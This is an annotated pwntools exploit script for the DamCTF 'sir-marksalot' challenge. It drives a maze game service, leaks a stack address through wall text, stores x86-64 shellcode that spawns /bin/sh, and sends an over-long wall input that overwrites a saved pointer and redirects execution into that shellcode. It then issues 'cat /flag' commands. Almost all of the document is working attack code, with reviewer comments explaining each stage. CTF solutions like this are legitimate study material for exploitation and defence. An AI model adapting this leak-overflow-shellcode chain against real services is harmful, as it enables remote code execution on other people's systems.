sir-marksalot chal from damctf
#!/usr/bin/env python3
from pwn import *
print('------ TESTING VAL %d -=------' % int(sys.argv[1]))

# NOTE(review): this copy of the script lost all leading whitespace. The
# nesting below is reconstructed from syntax: the `continue`/`break`
# statements force everything into the outer `while True:`. The extent of a
# few `for` bodies is a best guess and is flagged where it occurs.
#
# `sys` and `time` are never imported explicitly; the script relies on
# `from pwn import *` bringing them into scope.
#
# Overall flow of one attempt: connect, walk the maze while rewriting the
# wall text of each room, store a machine-code payload in one room, read
# back a wall text that discloses a pointer-sized value, derive a guessed
# payload address from it, write that address with an over-long wall text,
# then walk on until the service answers with a line containing 'Grue'.
# Any attempt whose leak fails is dropped and retried on a new connection.
while True:
    # One fresh connection per attempt; the commented lines are the local
    # test targets the author switched between.
    p = remote('chals.damctf.xyz', 31314)
    #p = remote('localhost', 9999)
    #p = process('./sir-marksalot')
    p.recvuntil('What would you like to do?\n')
    p.sendline(b'jump up and down')

    # The helpers below are re-created on every attempt and all talk to the
    # module-level connection `p`.

    def get_maze():
        """Request the map with 'm' and return it as text.

        Reads up to 'This room has exits to the' and drops that trailer.
        The bytes from recvuntil go through str(), which yields the b'...'
        repr; that is why literal backslash-n sequences are turned into
        real newlines and the first three characters are sliced off
        (presumably the leading b' and the first newline -- confirm).
        One character at a fixed offset from the end is overwritten with
        'E'; presumably this marks a cell in the last row -- confirm.
        """
        p.recvuntil('something, m - show map):');
        p.sendline(b'm')
        maze = list(str(p.recvuntil('This room has exits to the')[:-len('This room has exits to the')]))
        # Offset is one border line plus 7 characters back from the end.
        maze[len(maze) - len('+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+\n') - 7] = 'E'
        retval = ''
        for i in maze:
            retval += i
        return retval.replace('\\n', '\n')[3:]

    def get_pos_idx(): # x, y
        """Return the (x, y) cell of the '*' marker in the current map.

        x is the marker's character index divided by 4 (cells are drawn
        four characters wide, as in the '+---' border) plus 1; y is the
        text line index halved (presumably each maze row takes two text
        lines -- confirm). Raises ValueError when no '*' is present.
        """
        i = 0
        for line in get_maze().strip().split('\n'):
            if '*' in line:
                return (line.index('*')//4 + 1), i//2
            i += 1
        raise ValueError('Could not find *')

    def leak():
        """Read the current room's wall text and return it as an integer.

        Returns None when the response has no 'On the wall is written: '
        line, or when the text is longer than 8 bytes (it is printed in
        that case). Otherwise the text is NUL-padded to 8 bytes, unpacked
        with u64, printed in hex and returned. The caller treats the value
        as a stack address, so this is the memory-disclosure step;
        presumably the wall text is printed past its stored length --
        confirm against the binary.
        """
        # Fixed sleeps instead of prompt matching: let pending output
        # arrive, discard it, then ask for a fresh view.
        time.sleep(0.8)
        p.clean()
        p.sendline('m')
        time.sleep(0.6)
        #move('m')
        data = p.recvuntil('you like ')
        if b'On the wall is written: ' not in data:
            return
        # Keep only what sits between the marker and the next blank line.
        data = data.split(b' is written: ')[1].split(b'\n\n')[0]
        if len(data) > 8:
            print(data)
            return
        data = u64(data.ljust(8, b'\x00'))
        print(hex(data))
        return data

    def can_move(x):
        """Send direction x and report whether the reply mentions a wall.

        NOTE(review): this returns True when ' a wall there' IS in the
        reply, i.e. when the move was blocked, which is the opposite of
        what the name suggests. It is not called anywhere in this script.
        """
        p.sendlineafter(b'm - show map): ', x)
        return b' a wall there' in p.recvuntil(b'What would')

    def move(x):
        """Send the single command x once the move prompt has appeared."""
        p.sendlineafter(b'm - show map): ', x)

    def clear(data=b'?'*(0x8*4)):
        """Send 'x', then send data at the following 'What would' prompt.

        Presumably 'x' is the action that writes text on the wall of the
        current room -- confirm. The default is 32 '?' bytes.
        """
        p.sendlineafter(b'm - show map): ', 'x')
        p.sendlineafter(b'What would', data)

    start_x, start_y = get_pos_idx()
    # 0x28 == 40. end_x is only referenced in the disabled block near the
    # end of the loop.
    end_x, end_y = 0x28, 0x28

    # Walk to a fixed starting corner, rewriting the wall text of every room
    # before leaving it. Presumably 'a'/'s'/'d'/'w' are left/down/right/up.
    for rel_xi in range(start_x - 1):
        clear()
        move('a')

    for rel_yi in range(end_y - start_y - 1):
        clear()
        move('s')

    # Raw x86-64 machine code: three NOP bytes, a 24-byte stub that embeds
    # the string '/bin//sh' and ends in a syscall instruction (it starts a
    # shell), then an int3 trap byte. Padded with '?' to 0x21 bytes.
    # NOTE(review): this only works if the process will execute bytes it
    # stored as data; a non-executable stack (NX) would stop this step.
    # Presumably the challenge binary was built without it -- confirm.
    payload = b'\x90\x90\x90' + b'\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05'
    payload += b'\xcc'
    payload = payload.ljust(0x21, b'?')
    print('payload len %d' % len(payload), '::', payload)

    num_extra = 9

    # Store the payload as this room's wall text, then continue to the right.
    clear(payload)
    # NOTE(review): loop body extent reconstructed (move + clear per step).
    for i in range(num_extra):
        move('d')
        clear()

    p.clean()
    #context.log_level = 'debug'
    p.sendline('s')

    # leak() returns None on failure; the subtraction then raises TypeError,
    # which is used as the "retry on a new connection" signal. 0xca20 is a
    # fixed offset that presumably only holds for this binary and setup.
    try:
        stack_rsp = leak() - 0xca20
    except TypeError:
        p.close()
        continue

    # Guessed address of the stored payload. The sys.argv[1] term is a
    # tunable adjustment in steps of 3, matching the 'TESTING VAL' banner;
    # presumably the script is re-run with different values.
    stack_payload = stack_rsp + 0xc320 + 0x78 + (int(sys.argv[1])*3)
    print('payload addr', hex(stack_payload))

    # Fixed walk to the room where the address is written.
    clear()
    move('w')
    clear()
    move('a')
    clear()
    move('a')
    clear()
    move('a')
    clear()
    # NOTE(review): loop body extent reconstructed (move + clear per step).
    for i in range(num_extra - 5):
        move('a')
        clear()
    move('s')
    # 8 filler bytes, the 8-byte guessed address, then 0x20 '?' bytes: 48
    # bytes against the 32-byte default used everywhere else. Presumably
    # the service accepts more input than the wall buffer holds, so this
    # overwrites an adjacent saved pointer -- confirm. A length check on
    # that input is the service-side fix.
    clear(b'B'*8 + p64(stack_payload) + b'?'*0x20)
    move('d')
    move('w')
    move('d')
    clear()
    move('w')
    clear()
    move('w')

    # NOTE(review): the result of leak() is discarded here, so a None return
    # does not raise TypeError and this except branch will not fire on a
    # failed leak, unlike the earlier try block.
    try:
        leak()
    except TypeError:
        p.close()
        continue

    # Keep rewriting the wall and stepping 'a' until a reply line contains
    # 'Grue'.
    while True:
        clear()
        p.sendline(b'a')
        if b'Grue' in p.recvline():
            break

    # Disabled code kept by the author as a bare string literal.
    '''
    for rel_xi in range(end_x - 5 - 1):
    clear()
    move('d')
    '''

    # Send the commands that print the flag, dump everything the service
    # returns until it closes the connection, and stop retrying.
    p.sendline('\necho WE WON ; whoami ; cat /flag ; cat /flag.txt ; cat flag ; exit')
    print(p.recvall())
    break